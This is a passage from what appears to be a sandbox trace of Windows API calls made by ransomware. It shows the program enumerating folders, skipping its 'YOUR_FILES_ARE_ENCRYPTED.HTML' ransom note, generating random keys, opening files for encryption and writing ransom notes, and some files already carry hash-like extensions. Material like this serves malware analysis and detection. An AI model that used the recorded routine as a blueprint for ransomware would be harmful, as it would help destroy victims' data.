ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 1 [0110.191] StrStrIW (lpFirst="MessageStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.191] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore") returned 55 [0110.191] GetProcessHeap () returned 0x600000 [0110.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.191] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore" [0110.191] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*" [0110.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.193] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="..", cAlternateFileName="")) returned 1 [0110.193] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0110.193] StrStrIW (lpFirst="edb.chk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.193] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.chk") returned 63 [0110.193] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0110.193] lstrlenW (lpString=".chk") returned 4 [0110.193] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0110.193] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edb.log", cAlternateFileName="")) returned 1 [0110.193] StrStrIW (lpFirst="edb.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.193] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log") returned 63 [0110.193] PathFindExtensionW (pszPath="edb.log") returned=".log" [0110.193] lstrlenW (lpString=".log") returned 4 [0110.193] PathFindExtensionW (pszPath="edb.log") returned=".log" [0110.193] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.194] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0110.194] StrStrIW (lpFirst="edb00001.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.194] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log") returned 68 [0110.194] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0110.194] lstrlenW (lpString=".log") returned 4 [0110.194] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0110.194] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.194] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0110.194] StrStrIW (lpFirst="edbres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.194] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs") returned 71 [0110.194] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0110.194] lstrlenW (lpString=".jrs") returned 4 [0110.194] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0110.194] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0110.194] StrStrIW (lpFirst="edbres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.194] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs") returned 71 [0110.194] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0110.194] lstrlenW (lpString=".jrs") returned 4 [0110.194] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0110.194] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0110.194] StrStrIW (lpFirst="edbtmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.194] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log") returned 66 [0110.194] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0110.194] lstrlenW (lpString=".log") returned 4 [0110.194] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0110.194] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.195] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 1 [0110.195] StrStrIW (lpFirst="SmsInterceptStore.db", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.195] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db") returned 76 [0110.195] PathFindExtensionW (pszPath="SmsInterceptStore.db") returned=".db" [0110.195] lstrlenW (lpString=".db") returned 3 [0110.195] PathFindExtensionW (pszPath="SmsInterceptStore.db") returned=".db" [0110.195] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.195] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x63c1fe, dwReserved1=0x63c1a8, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 0 [0110.195] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.196] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0110.196] GetProcessHeap () returned 0x600000 [0110.196] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.197] GetProcessHeap () returned 0x600000 [0110.197] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.197] GetProcessHeap () returned 0x600000 [0110.197] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.198] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 0 [0110.198] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.198] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0110.198] GetProcessHeap () returned 0x600000 [0110.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\SmsRouter\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.198] GetProcessHeap () returned 0x600000 [0110.198] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.198] GetProcessHeap () returned 0x600000 [0110.198] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.199] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf18de17, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf18de17, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0110.199] StrStrIW (lpFirst="User Account Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.199] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned 54 [0110.199] GetProcessHeap () returned 0x600000 [0110.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.200] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" [0110.200] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*" [0110.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf18de17, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf18de17, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf18de17, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf18de17, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf150dae, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62", cAlternateFileName="")) returned 1 [0110.201] StrStrIW (lpFirst="guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.201] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62") returned 129 [0110.201] PathFindExtensionW (pszPath="guest.bmp.C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62") returned=".C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62" [0110.201] lstrlenW (lpString=".C2F66F9290EDAAA108CDCC3B5CB4ED9540F486E1F47C6D3947B7BC92D5F32B62") returned 65 [0110.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf1884fa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219", cAlternateFileName="")) returned 1 [0110.201] StrStrIW (lpFirst="guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.201] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219") returned 129 [0110.201] PathFindExtensionW (pszPath="guest.png.011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219") returned=".011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219" [0110.201] lstrlenW (lpString=".011D5B71CE830F11A020752FBB93997DD6B43F9FEEDC842F34017A6122497219") returned 65 [0110.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d47fe2c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="RDhJ0CNFevzX.dat", cAlternateFileName="RDHJ0C~1.DAT")) returned 1 [0110.201] StrStrIW (lpFirst="RDhJ0CNFevzX.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.201] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat") returned 71 [0110.201] PathFindExtensionW (pszPath="RDhJ0CNFevzX.dat") returned=".dat" [0110.201] lstrlenW (lpString=".dat") returned 4 [0110.201] PathFindExtensionW (pszPath="RDhJ0CNFevzX.dat") returned=".dat" [0110.201] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RDhJ0CNFevzX.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\rdhj0cnfevzx.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0110.201] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=0) returned 1 [0110.201] CloseHandle (hObject=0x308) returned 1 [0110.201] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf056d06, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x967, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425", cAlternateFileName="")) returned 1 [0110.201] StrStrIW (lpFirst="user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.201] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425") returned 132 [0110.202] PathFindExtensionW (pszPath="user-192.png.6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425") returned=".6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425" [0110.202] lstrlenW (lpString=".6C1F84D131BF31DAEE6409A8027EAB66DBE635E9A401EE46DFB60FB9A574E425") returned 65 [0110.202] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19f, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user-32.png", cAlternateFileName="")) returned 1 [0110.202] StrStrIW (lpFirst="user-32.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.202] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png") returned 66 [0110.202] PathFindExtensionW (pszPath="user-32.png") returned=".png" [0110.202] lstrlenW (lpString=".png") returned 4 [0110.202] PathFindExtensionW (pszPath="user-32.png") returned=".png" [0110.202] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0110.202] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=415) returned 1 [0110.202] CloseHandle (hObject=0x308) returned 1 [0110.202] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1, 